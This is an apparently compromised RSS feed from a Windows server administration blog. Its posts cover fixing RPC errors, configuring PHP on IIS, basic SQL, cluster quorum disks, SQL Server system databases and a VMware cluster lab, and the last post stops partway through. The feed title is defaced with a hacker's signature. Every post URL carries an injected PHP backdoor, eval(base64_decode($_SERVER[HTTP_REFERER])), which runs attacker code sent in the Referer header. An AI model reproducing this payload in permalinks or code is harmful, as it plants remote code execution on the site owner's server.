<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>HACKED By ATesS islami hacker www.ates-hatti.com</title>
	<atom:link href="http://winadmin.co.uk/feed/" rel="self" type="application/rss+xml" />
	<link>http://winadmin.co.uk</link>
	<description>HACKED By ATesS islami hacker www.ates-hatti.com</description>
	<pubDate>Sat, 21 Feb 2009 16:56:02 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.2</generator>
	<language>en</language>
			<item>
		<title>Fix : RPC server Unavailable</title>
		<link>http://winadmin.co.uk/2008/12/16/fix-rpc-server-unavailable/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/12/16/fix-rpc-server-unavailable/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Tue, 16 Dec 2008 06:58:45 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[IIS]]></category>

		<category><![CDATA[2000]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[2005]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[asp]]></category>

		<category><![CDATA[asp.net]]></category>

		<category><![CDATA[DisableTaskOffload]]></category>

		<category><![CDATA[DWORD]]></category>

		<category><![CDATA[EnableRSS]]></category>

		<category><![CDATA[EnableTCPA]]></category>

		<category><![CDATA[error]]></category>

		<category><![CDATA[fix]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[MSSQL]]></category>

		<category><![CDATA[regedit]]></category>

		<category><![CDATA[registry]]></category>

		<category><![CDATA[rpc]]></category>

		<category><![CDATA[RSS]]></category>

		<category><![CDATA[server.unavailable]]></category>

		<category><![CDATA[SQL]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=152</guid>
		<description><![CDATA[If you try to run the Netdom.exe query fsmo command or if you try to run any remote procedure call (RPC)-based tool on the ISA server, you may receive the following error message :
&#8220;RPC server Unavailable&#8221;
Here is a quick fix for this error message :-
Configure the EnableRSS registry value and the EnableTCPA registry value
1. Click [...]]]></description>
			<content:encoded><![CDATA[<p>If you try to run the Netdom.exe query fsmo command or if you try to run any remote procedure call (RPC)-based tool on the ISA server, you may receive the following error message :</p>
<p>&#8220;<strong><em>RPC server Unavailable&#8221;</em></strong></p>
<p>Here is a quick fix for this error message :-</p>
<p><strong>Configure the EnableRSS registry value and the EnableTCPA registry value</strong></p>
<p>1. Click <strong>Start</strong>, click <strong>Run</strong>, type in <strong>regedit</strong>, and then click <strong>OK</strong>.</p>
<p>2. Locate and then click the following registry subkey: <strong>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\Tcpip\Parameters</strong></p>
<p>3. On the Edit menu, point to New, click <strong>DWORD </strong>Value, and then type <strong>EnableRSS</strong>.</p>
<p>4. Double-click <strong>EnableRSS</strong>, type <strong>0</strong>, and then click <strong>OK</strong>.</p>
<p>5. On the <strong>Edit </strong>menu, point to New, click DWORD Value, and then type EnableTCPA.</p>
<p>6. Double-click <strong>EnableTCPA</strong>, type <strong>0</strong>, and then click <strong>OK</strong>.</p>
<p>7. Exit Registry Editor, and then restart the server.</p>
<p><strong>Configure the DisableTaskOffload registry entry</strong></p>
<p>If you continue to receive RPC errors, follow these steps:</p>
<p>1. Click <strong>Start</strong>, click <strong>Run</strong>, type <strong>regedit</strong>, and then click <strong>OK</strong>.</p>
<p>2. Locate and then click the following registry subkey: <strong>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic  es\Tcpip\Parameters</strong></p>
<p>3. In the details pane, make sure that the DisableTaskOffload registry entry exists. If this entry does not exist, add the entry. To do this, follow these steps :</p>
<p><strong>#</strong>. On the <strong>Edit </strong>menu, point to New, and then click <strong>DWORD </strong>Value<br />
<strong>#</strong>. Type <strong>DisableTaskOffload</strong>.</p>
<p>4. Double Click <strong>DisableTaskOffload</strong>, type <strong>1</strong>, and then click <strong>OK</strong>.</p>
<p>5. Exit Registry Editor, and then restart the server.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/12/16/fix-rpc-server-unavailable/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Configuring PHP to work on Windows Server 2003</title>
		<link>http://winadmin.co.uk/2008/12/10/configuring-php-to-work-on-windows-server-2003/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/12/10/configuring-php-to-work-on-windows-server-2003/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 10 Dec 2008 19:15:00 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[IIS]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[extension]]></category>

		<category><![CDATA[Microsoft]]></category>

		<category><![CDATA[PHP]]></category>

		<category><![CDATA[server]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=142</guid>
		<description><![CDATA[Simple steps to configure PHP with Windows  
Suppose you have installed IIS and PHP say at C:\PHP on your Windows server then to configure PHP in IIS you can follow the below mentioned steps :-
Open up Internet Information Server(IIS) :-

Click on &#8220;Web Service Extensions&#8221;, on the left side you will find a green arrow [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Simple steps to configure PHP with Windows <img src='http://winadmin.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Configuring Php To Work On Windows Server 2003" /> </strong></p>
<p>Suppose you have installed IIS and PHP say at C:\PHP on your Windows server then to configure PHP in IIS you can follow the below mentioned steps :-</p>
<p>Open up Internet Information Server(IIS) :-</p>
<p><img style="cursor: -moz-zoom-in;" src="../Image1.PNG" alt="http://winadmin.co.uk/Image1.PNG" width="390" height="288" title="Configuring Php To Work On Windows Server 2003" /></p>
<p>Click on &#8220;Web Service Extensions&#8221;, on the left side you will find a green arrow near to &#8220;Add a new Web service extension&#8230;&#8221; click on it.</p>
<p><img style="cursor: -moz-zoom-in;" src="../Image2.PNG" alt="http://winadmin.co.uk/Image2.PNG" width="623" height="456" title="Configuring Php To Work On Windows Server 2003" /></p>
<p>A pop up window will be appeared. Enter Extension name say .php and for the Required Files put &#8220;C:\PHP\php.exe&#8221;, enable the check box of &#8220;Set extension status to Allowed&#8221; at bottom :-</p>
<p><img src="../Image3.PNG" alt="http://winadmin.co.uk/Image3.PNG" title="Configuring Php To Work On Windows Server 2003" /></p>
<p>Now to add extension for the web site if its not there, right click on web site in question and select Properties &gt;&gt; Home Directory &gt;&gt; Configuration &gt;&gt; Add &gt;&gt; here you can add the extension shown as below :-</p>
<p><img style="cursor: -moz-zoom-in;" src="../Image4.PNG" alt="http://winadmin.co.uk/Image4.PNG" width="613" height="455" title="Configuring Php To Work On Windows Server 2003" /></p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/12/10/configuring-php-to-work-on-windows-server-2003/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Basic SQL Statements</title>
		<link>http://winadmin.co.uk/2008/12/08/basic-sql-statements/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/12/08/basic-sql-statements/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 08 Dec 2008 00:20:50 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[Microsoft SQL Server]]></category>

		<category><![CDATA[2005]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[access]]></category>

		<category><![CDATA[ASC]]></category>

		<category><![CDATA[basic]]></category>

		<category><![CDATA[clause]]></category>

		<category><![CDATA[database]]></category>

		<category><![CDATA[delete]]></category>

		<category><![CDATA[DESC]]></category>

		<category><![CDATA[IIS]]></category>

		<category><![CDATA[insert]]></category>

		<category><![CDATA[join]]></category>

		<category><![CDATA[MS access]]></category>

		<category><![CDATA[MSSQL]]></category>

		<category><![CDATA[mysql]]></category>

		<category><![CDATA[order by]]></category>

		<category><![CDATA[Query]]></category>

		<category><![CDATA[record]]></category>

		<category><![CDATA[records]]></category>

		<category><![CDATA[select]]></category>

		<category><![CDATA[server]]></category>

		<category><![CDATA[SQL]]></category>

		<category><![CDATA[statement]]></category>

		<category><![CDATA[table]]></category>

		<category><![CDATA[update]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=137</guid>
		<description><![CDATA[Basic SQL Statements :
SQL is used to query the database which are almost same for SQL Server, MS Access, Oracle and MySQL.
There are four types of basic queries :-
SELECT
INSERT
UPDATE
DELETE
ORDER BY
Different combination of parameters can be passed to a query.
1] SELECT :-
its the most common SQL statement using which data can be selected from database and [...]]]></description>
			<content:encoded><![CDATA[<p><strong>Basic SQL Statements :</strong></p>
<p><strong>SQL</strong> is used to query the database which are almost same for <strong>SQL Server</strong>, <strong>MS Access</strong>, <strong>Oracle</strong> and <strong>MySQL</strong>.<br />
There are four types of basic queries :-</p>
<p><strong>SELECT<br />
INSERT<br />
UPDATE<br />
DELETE<br />
ORDER BY</strong></p>
<p>Different combination of parameters can be passed to a query.</p>
<p><strong>1] SELECT :-</strong></p>
<p>its the most common SQL statement using which data can be selected from database and the output is returned to user.The result is</p>
<p>stored in a result table, called the result-set.SQL is not case sensitive. SELECT is the same as select.<br />
Here is a simple example -</p>
<p>select name, bdate from user;<br />
this will return all names and bdates from the table user.</p>
<p>select * from user;<br />
this will return all records of user table.</p>
<p>select * from user where name=&#8217;john&#8217;;<br />
this will return all records in which name = john</p>
<p>select * from user where name=&#8217;john&#8217; OR name=&#8217;paul&#8217; OR bdate=01012007<br />
this way you can add multiple filtering using &#8220;OR&#8221; , &#8220;AND&#8221; clause.</p>
<p><strong>2] INSERT :-</strong></p>
<p>it is used to take the data input from user and insert it into table of the database. Data can be taken from any form or it can be</p>
<p>directly inserted using query.It is used to insert a new row in a table.<br />
Simple example-<br />
Insert into Table1 (FirstName, LastName, Phone) Values (&#8217;Gabriel&#8217;, &#8216;R&#8217;, &#8216;1112222&#8242;);</p>
<p><strong>3] UPDATE :-</strong></p>
<p>Using Update, we edit / modify any exisiting table. Either all the rows can be updated, or a subset may be chosen using a condition.<br />
Simple example -<br />
Update Table1 Set name=@FirstName, LastName=@LastName, Phone=@Phone where id=@ID</p>
<p>WHERE clause us very important in Update query. If you don&#8217;t use WHERE then it will update all existing records in the table.</p>
<p><strong>4] DELETE :-</strong></p>
<p>It is used to delete rows in a table. It also uses WHERE claue. The WHERE clause specifies which record or records that should be deleted. If you omit the WHERE clause, all records will be deleted.<br />
Here is an example of a Delete statement-</p>
<p>Delete From Table1 where ID=10</p>
<p>it will delete all records in which ID = 10</p>
<p><strong>5] Order By Clauses :-</strong></p>
<p>It is used to sort the output returned by a query. Using this clause, you can sort by any field in the table.<br />
Example -<br />
Select * from Table1 Order By name</p>
<p>This will list all returned records sorted by Name alphabetically.</p>
<p>&#8216;ASC&#8217; (ascending order) or &#8216;DESC&#8217; (descending order) can be included in Orderby query to sort the output in ascending or descending order respectively.<br />
Like -</p>
<p>Select * from Table1 Order By name DESC</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/12/08/basic-sql-statements/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>What is Quorums in Cluster and its use</title>
		<link>http://winadmin.co.uk/2008/12/06/what-is-quorums-in-cluster-and-its-use/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/12/06/what-is-quorums-in-cluster-and-its-use/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 06 Dec 2008 15:56:33 +0000</pubDate>
		<dc:creator>Mithil</dc:creator>
		
		<category><![CDATA[IIS]]></category>

		<category><![CDATA[Microsoft SQL Server]]></category>

		<category><![CDATA[Windows WebHosting]]></category>

		<category><![CDATA[2003 cluster]]></category>

		<category><![CDATA[function of  Quorum]]></category>

		<category><![CDATA[Quorum disk size]]></category>

		<category><![CDATA[Quorums in Cluster]]></category>

		<category><![CDATA[use of Quorums]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=132</guid>
		<description><![CDATA[Hi
Their are lots of misunderstanding/confusion in Quorum Disk working and its size required.
I will try to sort out this Confusion in this discussion
This post will help, to understand those people who know what Cluster&#8217;s are. However, going in this discussion we must know how cluster work.
Cluster is a service which is used for Fault tolerance [...]]]></description>
			<content:encoded><![CDATA[<p>Hi</p>
<p>Their are lots of misunderstanding/confusion in <strong>Quorum Disk</strong> working and its size required.</p>
<p>I will try to sort out this Confusion in this discussion</p>
<p>This post will help, to understand those people who know what Cluster&#8217;s are. However, going in this discussion we must know how cluster work.</p>
<p>Cluster is a service which is used for Fault tolerance of an application, it is not for Load balancing as one server is in Active mode and others are in Passive mode. All resources are owned by one [Active] node in cluster. So when Active node is owner of resources it will serve all the request coming to it.</p>
<p>Now if this Active node goes down then all the services that this server is running will be transferred to other node [Passive], and then Passive node become Active  node.</p>
<p>Now how does the Passive node comes to know that Active node is down and I should start working as Active node.</p>
<p>Now here comes the involvement  of &#8220;Quorums Disk&#8221; .</p>
<p>When you configure Cluster for very first time, all Cluster configuration Database information are stored in this &#8220;Quorums Disk&#8221; in \MSCS\quolog.log. The quorum is also referred to as the quorum log. Quorums has to perform two most important jobs, those are, it lets the cluster service know which node should be active and be owner of resources. Node that is owner of the resources can only be in Active Mode. QUORUM is the main interpreter between all Nodes of cluster and help other node to take ownership when Active node goes down.</p>
<p>In some cases if internal communication of Cluster node fails, Say &#8220;Heart Beat&#8221; link goes down, Passive node will consider Active node has gown down, and start querying Quorum disk that Active node has gone down and request to transfer all the resources to him, but this is not the case as Active node is still functioning, so again Quorum disk play important role to reject Passive node request.</p>
<p>Disk size</p>
<p>Recommended Size is just 100mb, I would suggest to give 300-500mb.</p>
<p>Hope this post will help you <img src='http://winadmin.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="What Is Quorums In Cluster And Its Use " /> </p>
<p>In my next post i will let know what pre-cluster node configuration to check before configuring Cluster.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/12/06/what-is-quorums-in-cluster-and-its-use/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>How to start SQL server 2000 in Single User Mode</title>
		<link>http://winadmin.co.uk/2008/11/26/how-to-start-sql-server-2000-in-single-user-mode/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/11/26/how-to-start-sql-server-2000-in-single-user-mode/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 26 Nov 2008 06:49:34 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[Microsoft SQL Server]]></category>

		<category><![CDATA[alter]]></category>

		<category><![CDATA[cmd]]></category>

		<category><![CDATA[database]]></category>

		<category><![CDATA[master]]></category>

		<category><![CDATA[mode]]></category>

		<category><![CDATA[msdb]]></category>

		<category><![CDATA[MSSQL]]></category>

		<category><![CDATA[mssqlserver]]></category>

		<category><![CDATA[multi]]></category>

		<category><![CDATA[Net]]></category>

		<category><![CDATA[server]]></category>

		<category><![CDATA[single]]></category>

		<category><![CDATA[SQL]]></category>

		<category><![CDATA[sqlservr]]></category>

		<category><![CDATA[start]]></category>

		<category><![CDATA[stop]]></category>

		<category><![CDATA[tempdb]]></category>

		<category><![CDATA[user]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=129</guid>
		<description><![CDATA[
Single User mode allows only one single user to connect to the database.
Even if SQL server is in Single User Mode, you can connect the SQL Query Analyzer with the SA user.
Single user mode specifies that only one user at a time can access the database. Basically it is used for maintenance purposes.
If any other [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://images.google.co.in/imgres?imgurl=http://www.nonprofitwebhosting.net/images/sql_logo.jpg&amp;imgrefurl=http://www.nonprofitwebhosting.net/services.htm&amp;usg=__TldCjFkhcidb-xiyMD4IJwHW-d8=&amp;h=59&amp;w=176&amp;sz=5&amp;hl=en&amp;start=32&amp;um=1&amp;tbnid=H5xJoeFHbYTb_M:&amp;tbnh=34&amp;tbnw=100&amp;prev=/images%3Fq%3DSQL%2Blogo%26start%3D21%26um%3D1%26hl%3Den%26sa%3DN"><img style="border: 1px solid;" src="http://tbn1.google.com/images?q=tbn:H5xJoeFHbYTb_M:http://www.nonprofitwebhosting.net/images/sql_logo.jpg" alt="sql_logo How to start SQL server 2000 in Single User Mode" width="100" height="34" title="How To Start Sql Server 2000 In Single User Mode" /></a></p>
<p><strong>Single User mode</strong> allows only one single user to connect to the database.<br />
Even if SQL server is in Single User Mode, you can connect the SQL Query Analyzer with the SA user.</p>
<p><strong>Single user mode</strong> specifies that only one user at a time can access the database. Basically it is used for maintenance purposes.</p>
<p>If any other users are connected to the <strong>database</strong> and you  switch the database to <strong>single user mode</strong> then their connections to the database will be closed without any warning message.</p>
<p>Following are the steps to start SQL server in <strong>Single User mode</strong> -</p>
<p>On your server :</p>
<p>Start &gt;&gt; Run &gt;&gt; type in CMD and hit Ok &gt;&gt; it will open up Command Prompt &gt;&gt; here execute the following command</p>
<p><strong>net stop MSSqlServer</strong></p>
<p>&gt;&gt; it will stop the SQL service &gt;&gt; now to start SQL in <strong>Single User mode</strong> execute following command</p>
<p><strong>sqlservr -m</strong></p>
<p>####</p>
<p><strong>How to Set a single database into Single User Mode :- </strong></p>
<p>You can set a single database into single user mode using an alternative procedure but this process cannot be used to set the <strong>MASTER</strong> database into single user mode.</p>
<p># Connect to SQL Server using <strong>SQL Query Analyzer </strong>with <strong>SA</strong> user</p>
<p># Execute the following command -</p>
<p><strong>alter database database-name set SINGLE_USER</strong></p>
<p>where &#8220;database-name&#8221; is the actual name of the database.</p>
<p>This cannot be used to place the databases <strong>MASTER, MSDB or TEMPDB</strong> in single user mode.</p>
<p># To set the database back into normal multi-user mode use, execute the following command -</p>
<p><strong>alter database db-name set MULTI_USER</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/11/26/how-to-start-sql-server-2000-in-single-user-mode/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Database Connection String</title>
		<link>http://winadmin.co.uk/2008/11/24/database-connection-string/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/11/24/database-connection-string/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 24 Nov 2008 13:39:51 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[Microsoft SQL Server]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[2008]]></category>

		<category><![CDATA[ADO]]></category>

		<category><![CDATA[Catalog]]></category>

		<category><![CDATA[connection]]></category>

		<category><![CDATA[data]]></category>

		<category><![CDATA[database]]></category>

		<category><![CDATA[driver]]></category>

		<category><![CDATA[MSSQL]]></category>

		<category><![CDATA[ODBC]]></category>

		<category><![CDATA[OLEDB]]></category>

		<category><![CDATA[password]]></category>

		<category><![CDATA[provider]]></category>

		<category><![CDATA[providerName]]></category>

		<category><![CDATA[server]]></category>

		<category><![CDATA[source]]></category>

		<category><![CDATA[SQL]]></category>

		<category><![CDATA[SqlClient]]></category>

		<category><![CDATA[string]]></category>

		<category><![CDATA[user]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=126</guid>
		<description><![CDATA[A connection string is a string which contains information about a data source and its connectivity.
Connection string is always passed to a driver or provider which initiate the actual database connection.
It includes the attributes like name of the driver, server/host address, database name, security information like user name and password.
The format of a connection string [...]]]></description>
			<content:encoded><![CDATA[<p>A <strong>connection string</strong> is a string which contains information about a data source and its connectivity.<br />
<strong>Connection string</strong> is always passed to a driver or provider which initiate the actual <strong>database connection</strong>.<br />
It includes the attributes like name of the driver, server/host address, database name, security information like user name and password.<br />
The format of a connection string is a semicolon-delimited list of key/value parameter pairs.</p>
<p>Following is a sample SQL database connection string :-</p>
<p>&lt;add name=&#8221;SampleConnectionString&#8221; connectionString=&#8221;Data Source=AAAAAA;Initial Catalog=BBBBBB;User ID=CCCCCC;Password=DDDDDD&#8221; providerName=&#8221;System.Data.SqlClient&#8221; /&gt;</p>
<p>Where :<br />
AAAAAA : Your server&#8217;s actual IP address.<br />
BBBBBB : Your database&#8217;s actual Name.<br />
CCCCCC : Your database&#8217;s actual Username.<br />
DDDDDD : Your database&#8217;s actual Password.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/11/24/database-connection-string/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>System Databases in SQL Server</title>
		<link>http://winadmin.co.uk/2008/11/19/system-databases-in-sql-server/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/11/19/system-databases-in-sql-server/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 19 Nov 2008 12:16:03 +0000</pubDate>
		<dc:creator>Gabriel</dc:creator>
		
		<category><![CDATA[Microsoft SQL Server]]></category>

		<category><![CDATA[2003]]></category>

		<category><![CDATA[database]]></category>

		<category><![CDATA[IIS]]></category>

		<category><![CDATA[master]]></category>

		<category><![CDATA[model]]></category>

		<category><![CDATA[msdb]]></category>

		<category><![CDATA[MSSQL]]></category>

		<category><![CDATA[SQL]]></category>

		<category><![CDATA[system]]></category>

		<category><![CDATA[tempdb]]></category>

		<category><![CDATA[Windows]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=123</guid>
		<description><![CDATA[System Databases in SQL Server :-
A Database Administrator shold be aware of system databases which is an integral part of the SQL Server.
System Databases are essential for the operation of a server instance.
Following are System Database in SQL Server 2005 &#38; 2008.
Master Database :-
Master database is the heart of SQL Server, it records all system-level [...]]]></description>
			<content:encoded><![CDATA[<p><strong>System Databases in SQL Server :-</strong></p>
<p>A Database Administrator shold be aware of system databases which is an integral part of the SQL Server.</p>
<p>System Databases are essential for the operation of a server instance.</p>
<p>Following are System Database in SQL Server 2005 &amp; 2008.</p>
<p><strong>Master Database</strong> :-</p>
<p>Master database is the heart of SQL Server, it records all system-level information of a SQL Server which includes instance-wide metadata such as logon accounts, endpoints, linked servers, system configuration settings, System Level Stored Procedures, System level Functions, all other existing databases, their MDF/LDF data file location etc.<br />
Each SQL instance have its own Master database.<br />
Master database consists of two physical files, namely master.mdf (data file) and mastlog.ldf (log file).<br />
SQL Service can not be started if there is any problem with master database or its database files.<br />
There are some restrictions on Master Database, you are not allowed to perform all the operations that you perform with normal database like, you can not add files or file groups, you can not change the owner, you can not drop the database, you can not change the collation, you can not remove the filegroup, primary data file, or log file, you can not take the database offline&#8230;</p>
<p><strong>Model Database :-</strong></p>
<p>The model database is used as the template for all databases created on an instance of SQL Server.<br />
While creating a new database, SQL Server create it by getting a template from Model Database. Hence any change that you make in Model Database will reflect in newly created database as well for e.g. if a user creates any tables, stored procedures, user defined data types in Model database then those objects will be available in every newly created database as well.<br />
Model database consists of two physical files namely Model.mdf (data file) and ModelLog.ldf (log file).<br />
If the Model database is damaged or corrupted then SQL Server Service will not start up as it will not be able to create the tempdb database as TempDB database is recreated on every restart of SQL service.<br />
Restrictions on Model Database are the same as that on Master Database.</p>
<p><strong>MSDB Database :-</strong></p>
<p>MSDB is the database used by SQL server Agent to store configuration information, Agent Jobs, Job schedules, Alerts, Operators, Service Broker, Log Shipping, database backups and restore information, Maintenance Plan Configuration, Configuration of Database Mail etc.<br />
MSDB database consists of two physical files namely MSDBData.mdf (data file) and MSDBLog.ldf (log file).<br />
The scheduling information used by SQL Server Agent will be lost in case of any problem occured with MSDB database.<br />
Restrictions on MSDB Database are the same as that on Master Database.</p>
<p><strong>TempDB Database :-</strong></p>
<p>The TempDB is the only database which is recreated every time when SQL Server restarts.<br />
It is besically used to store all the temporary objects like temporary tables, temporary stored procedures, cursors, table variables etc.<br />
TempDB database consists of two physical files namely tempdb.mdf (data file) and templog.ldf (log file).<br />
A clean/new copy copy of TempDB is created on each restart of SQL server, there is never anything stored in tempdb from one session of SQL Server to another.</p>
]]></content:encoded>
			<wfw:commentRss>http://winadmin.co.uk/2008/11/19/system-databases-in-sql-server/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Windows 2003 Cluster On Vmware [Lab Environment]</title>
		<link>http://winadmin.co.uk/2008/11/12/windows-2003-cluster-on-vmware-lab-environment/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/</link>
		<comments>http://winadmin.co.uk/2008/11/12/windows-2003-cluster-on-vmware-lab-environment/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 12 Nov 2008 04:28:44 +0000</pubDate>
		<dc:creator>Mithil</dc:creator>
		
		<category><![CDATA[Windows WebHosting]]></category>

		<category><![CDATA[Disk.locking = FALSE]]></category>

		<category><![CDATA[Quorum disk]]></category>

		<category><![CDATA[Virtual machine]]></category>

		<category><![CDATA[vmscsi_.flp]]></category>

		<category><![CDATA[Vmware Lab Environment]]></category>

		<category><![CDATA[vmx]]></category>

		<category><![CDATA[Windows 2003 Cluster]]></category>

		<category><![CDATA[Windows 2003 Cluster On Vmware]]></category>

		<guid isPermaLink="false">http://winadmin.co.uk/?p=114</guid>
		<description><![CDATA[  
Step by Step Windows 2003 Cluster using VMware for testing Environment

It’s always good and must to have test environment rather than doing on live setup
Do I need to tell why?   


Host System Installation
Windows 2003 SP2 Enterprise Edition with 4 GB RAM Dual Core 2 NIC [Minimum recommendation]
Do the OS installation as [...]]]></description>
			<content:encoded><![CDATA[<p><!--[if !mso]> <mce:style><!  v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VML);} .shape {behavior:url(#default#VML);} --> <!--[endif]--><!--[if gte mso 9]><xml> <w:WordDocument> <w:View>Normal</w:View> <w:Zoom>0</w:Zoom> <w:PunctuationKerning /> <w:ValidateAgainstSchemas /> <w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid> <w:IgnoreMixedContent>false</w:IgnoreMixedContent> <w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText> <w:Compatibility> <w:BreakWrappedTables /> <w:SnapToGridInCell /> <w:WrapTextWithPunct /> <w:UseAsianBreakRules /> <w:DontGrowAutofit /> </w:Compatibility> <w:BrowserLevel>MicrosoftInternetExplorer4</w:BrowserLevel> </w:WordDocument> </xml><![endif]--><!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" LatentStyleCount="156"> </w:LatentStyles> </xml><![endif]--><!--  /* Style Definitions */  p.MsoNormal, li.MsoNormal, div.MsoNormal 	{mso-style-parent:""; 	margin:0in; 	margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:12.0pt; 	font-family:"Times New Roman"; 	mso-fareast-font-family:"Times New Roman";} @page Section1 	{size:8.5in 11.0in; 	margin:1.0in 1.25in 1.0in 1.25in; 	mso-header-margin:.5in; 	mso-footer-margin:.5in; 	mso-paper-source:0;} div.Section1 	{page:Section1;} --><!--[if gte mso 10]> <mce:style><!   /* Style Definitions */  table.MsoNormalTable 	{mso-style-name:"Table Normal"; 	mso-tstyle-rowband-size:0; 	mso-tstyle-colband-size:0; 	mso-style-noshow:yes; 	mso-style-parent:""; 	mso-padding-alt:0in 5.4pt 0in 5.4pt; 	mso-para-margin:0in; 	mso-para-margin-bottom:.0001pt; 	mso-pagination:widow-orphan; 	font-size:10.0pt; 	font-family:"Times New Roman"; 	mso-ansi-language:#0400; 	mso-fareast-language:#0400; 	mso-bidi-language:#0400;} --> <!--[endif]--></p>
<p class="MsoNormal" style="text-align: left;"><strong>Step by Step Windows 2003 Cluster using VMware for testing Environment</strong></p>
<p class="MsoNormal">
<p class="MsoNormal">It’s always good and must to have test environment rather than doing on live setup</p>
<p class="MsoNormal"><em>Do I need to tell why? </em> <img src='http://winadmin.co.uk/wp-includes/images/smilies/icon_smile.gif' alt=':-)' class='wp-smiley' title="Windows 2003 Cluster On Vmware [lab Environment]" /> <em><br />
</em></p>
<p class="MsoNormal">
<p class="MsoNormal"><strong>Host System Installation</strong></p>
<p class="MsoNormal">Windows 2003 SP2 Enterprise Edition with 4 GB RAM Dual Core 2 NIC [Minimum recommendation]</p>
<p class="MsoNormal">Do the OS installation as par the requirement, System drive 7 GB is enough</p>
<p class="MsoNormal">Update with SP2 and all latest patches</p>
